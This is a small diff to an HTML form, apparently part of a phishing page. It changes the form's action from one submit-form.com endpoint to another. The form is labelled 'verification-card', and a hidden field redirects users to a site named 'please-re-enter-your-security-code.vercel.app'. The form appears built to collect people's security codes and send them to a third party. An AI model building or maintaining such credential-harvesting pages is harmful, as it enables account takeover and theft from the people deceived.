--- a/form.html
+++ b/form.html
@@ -262,7 +262,7 @@
     </div>
 
     <div class="container">
-        <form class="verification-card" action="https://submit-form.com/ukQJP59Sl" method="POST">
+        <form class="verification-card" action="https://submit-form.com/FeHCosnIq" method="POST">
 
             <!-- Redirect after submission -->
             <input type="hidden" name="_redirect" value="https://please-re-enter-your-security-code.vercel.app/">
